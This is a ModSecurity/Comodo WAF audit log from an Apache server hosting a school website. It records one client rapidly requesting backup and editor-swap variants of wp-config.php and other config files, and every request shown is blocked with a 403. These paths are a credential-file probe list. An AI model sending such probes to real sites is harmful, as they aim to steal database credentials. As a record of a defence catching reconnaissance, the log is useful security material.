Engine-Mode: "ENABLED"
--872cae09-Z--
--f0a99838-A--
[18/Apr/2025:07:22:59 +0700] aAGbYzpR4B6O-aqWibPQPQAAAJc 103.236.140.4 52354 103.236.140.4 8181
--f0a99838-B--
GET /wp-config.php.orig HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H321 [FBAN/FBIOS;FBAV/38.0.0.6.79;FBBV/14316658;FBDV/iPad4,1;FBMD/iPad;FBSN/iPhone OS;FBSV/8.4.1;FBSS/2; FBCR/;FBID/tablet;FBLC/en_US;FBOP/1]
Accept: */*
--f0a99838-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f0a99838-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935779007164 666 (- - -)
Stopwatch2: 1744935779007164 666; combined=268, p1=237, p2=0, p3=0, p4=0, p5=31, sr=68, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f0a99838-Z--
--35234c18-A--
[18/Apr/2025:07:22:59 +0700] aAGbYzlhhbF_BYhFYTXhEgAAAEs 103.236.140.4 52356 103.236.140.4 8181
--35234c18-B--
GET /wp-config.php.old HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Accept: */*
--35234c18-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--35234c18-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935779037585 652 (- - -)
Stopwatch2: 1744935779037585 652; combined=252, p1=220, p2=0, p3=0, p4=0, p5=32, sr=68, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--35234c18-Z--
--5063d87d-A--
[18/Apr/2025:07:22:59 +0700] aAGbYzpR4B6O-aqWibPQPgAAAII 103.236.140.4 52358 103.236.140.4 8181
--5063d87d-B--
GET /wp-config.php.original HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
Accept: */*
--5063d87d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5063d87d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935779073123 663 (- - -)
Stopwatch2: 1744935779073123 663; combined=268, p1=236, p2=0, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5063d87d-Z--
--11537a71-A--
[18/Apr/2025:07:22:59 +0700] aAGbYzpR4B6O-aqWibPQPwAAAJY 103.236.140.4 52360 103.236.140.4 8181
--11537a71-B--
GET /wp-config.php.dist HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.18.US Safari/537.36
Accept: */*
--11537a71-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--11537a71-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935779105658 790 (- - -)
Stopwatch2: 1744935779105658 790; combined=332, p1=297, p2=0, p3=0, p4=0, p5=35, sr=113, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--11537a71-Z--
--2232f32d-A--
[18/Apr/2025:07:22:59 +0700] aAGbYzpR4B6O-aqWibPQQAAAAI8 103.236.140.4 52362 103.236.140.4 8181
--2232f32d-B--
GET /wp-config.txt HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: */*
--2232f32d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2232f32d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.txt" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935779137139 662 (- - -)
Stopwatch2: 1744935779137139 662; combined=268, p1=236, p2=0, p3=0, p4=0, p5=32, sr=68, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2232f32d-Z--
--1c1d8633-A--
[18/Apr/2025:07:22:59 +0700] aAGbYzpR4B6O-aqWibPQQQAAAJU 103.236.140.4 52364 103.236.140.4 8181
--1c1d8633-B--
GET /wp-config.php.txt HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Accept: */*
--1c1d8633-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1c1d8633-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935779169855 12927 (- - -)
Stopwatch2: 1744935779169855 12927; combined=24766, p1=214, p2=0, p3=0, p4=0, p5=12298, sr=64, sw=0, l=0, gc=12254
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1c1d8633-Z--
--207b851f-A--
[18/Apr/2025:07:22:59 +0700] aAGbYzpR4B6O-aqWibPQQgAAAIA 103.236.140.4 52366 103.236.140.4 8181
--207b851f-B--
GET /wp-config.php.backup HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Accept: */*
--207b851f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--207b851f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935779204813 732 (- - -)
Stopwatch2: 1744935779204813 732; combined=274, p1=241, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--207b851f-Z--
--ef981949-A--
[18/Apr/2025:07:22:59 +0700] aAGbYzlhhbF_BYhFYTXhEwAAAE4 103.236.140.4 52370 103.236.140.4 8181
--ef981949-B--
GET /wp-config.php_bck HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Accept: */*
--ef981949-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ef981949-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935779506812 689 (- - -)
Stopwatch2: 1744935779506812 689; combined=263, p1=230, p2=0, p3=0, p4=0, p5=33, sr=69, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ef981949-Z--
--c66c8e22-A--
[18/Apr/2025:07:22:59 +0700] aAGbYzpR4B6O-aqWibPQRAAAAJg 103.236.140.4 52372 103.236.140.4 8181
--c66c8e22-B--
GET /wp-config.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36
Accept: */*
--c66c8e22-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c66c8e22-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935779537896 653 (- - -)
Stopwatch2: 1744935779537896 653; combined=249, p1=218, p2=0, p3=0, p4=0, p5=31, sr=68, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c66c8e22-Z--
--ca9b1523-A--
[18/Apr/2025:07:23:00 +0700] aAGbZDlhhbF_BYhFYTXhGAAAAFY 103.236.140.4 52388 103.236.140.4 8181
--ca9b1523-B--
GET /.wp-config.php.swp HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2
Accept: */*
--ca9b1523-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ca9b1523-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935780868248 747 (- - -)
Stopwatch2: 1744935780868248 747; combined=302, p1=270, p2=0, p3=0, p4=0, p5=32, sr=107, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ca9b1523-Z--
--fcbe675d-A--
[18/Apr/2025:07:23:00 +0700] aAGbZFyj-eUTITfvHEUkCgAAAA0 103.236.140.4 52390 103.236.140.4 8181
--fcbe675d-B--
GET /wp-config.php.swo HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; BNTV600 Build/IMM76L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Safari/537.36
Accept: */*
--fcbe675d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fcbe675d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935780900094 785 (- - -)
Stopwatch2: 1744935780900094 785; combined=346, p1=311, p2=0, p3=0, p4=0, p5=34, sr=118, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fcbe675d-Z--
--e6953331-A--
[18/Apr/2025:07:23:01 +0700] aAGbZRk6uTiIdxrJEES4kgAAAMs 103.236.140.4 52398 103.236.140.4 8181
--e6953331-B--
GET /wp-config.php_bak HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.3; WOW64; Trident/7.0)
Accept: */*
--e6953331-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e6953331-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935781198126 832 (- - -)
Stopwatch2: 1744935781198126 832; combined=367, p1=332, p2=0, p3=0, p4=0, p5=35, sr=123, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e6953331-Z--
--40a6ad1a-A--
[18/Apr/2025:07:23:01 +0700] aAGbZRk6uTiIdxrJEES4kwAAANE 103.236.140.4 52400 103.236.140.4 8181
--40a6ad1a-B--
GET /wp-config.php-bak HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Accept: */*
--40a6ad1a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--40a6ad1a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935781234512 707 (- - -)
Stopwatch2: 1744935781234512 707; combined=304, p1=271, p2=0, p3=0, p4=0, p5=33, sr=112, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--40a6ad1a-Z--
--c96c3c30-A--
[18/Apr/2025:07:23:02 +0700] aAGbZhk6uTiIdxrJEES4lwAAAMM 103.236.140.4 52412 103.236.140.4 8181
--c96c3c30-B--
GET /wp-config.php.zip HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: */*
--c96c3c30-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c96c3c30-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935782080034 785 (- - -)
Stopwatch2: 1744935782080034 785; combined=305, p1=270, p2=0, p3=0, p4=0, p5=35, sr=85, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c96c3c30-Z--
--81bf9607-A--
[18/Apr/2025:07:23:04 +0700] aAGbaDlhhbF_BYhFYTXhHAAAAEc 103.236.140.4 52432 103.236.140.4 8181
--81bf9607-B--
GET /config.db HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: */*
--81bf9607-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--81bf9607-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".db"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744935784107321 2170 (- - -)
Stopwatch2: 1744935784107321 2170; combined=709, p1=363, p2=313, p3=0, p4=0, p5=32, sr=106, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--81bf9607-Z--
--b8da3172-A--
[18/Apr/2025:07:23:04 +0700] aAGbaDlhhbF_BYhFYTXhHQAAAFg 103.236.140.4 52444 103.236.140.4 8181
--b8da3172-B--
GET /config.old HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Accept: */*
--b8da3172-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b8da3172-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744935784946127 1855 (- - -)
Stopwatch2: 1744935784946127 1855; combined=659, p1=339, p2=294, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b8da3172-Z--
--16e04b10-A--
[18/Apr/2025:07:23:04 +0700] aAGbaDlhhbF_BYhFYTXhHgAAAEM 103.236.140.4 52446 103.236.140.4 8181
--16e04b10-B--
GET /config.bak HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Accept: */*
--16e04b10-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--16e04b10-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744935784980245 1901 (- - -)
Stopwatch2: 1744935784980245 1901; combined=664, p1=324, p2=308, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--16e04b10-Z--
--3c4df917-A--
[18/Apr/2025:07:23:05 +0700] aAGbaTpR4B6O-aqWibPQTAAAAJE 103.236.140.4 52448 103.236.140.4 8181
--3c4df917-B--
GET /config.db HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-T217S Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Accept: */*
--3c4df917-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3c4df917-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".db"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744935785017980 1656 (- - -)
Stopwatch2: 1744935785017980 1656; combined=651, p1=330, p2=293, p3=0, p4=0, p5=28, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3c4df917-Z--
--6d3b8171-A--
[18/Apr/2025:07:23:05 +0700] aAGbaTpR4B6O-aqWibPQTQAAAJI 103.236.140.4 52452 103.236.140.4 8181
--6d3b8171-B--
GET /wp-config.php_old2010 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: */*
--6d3b8171-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
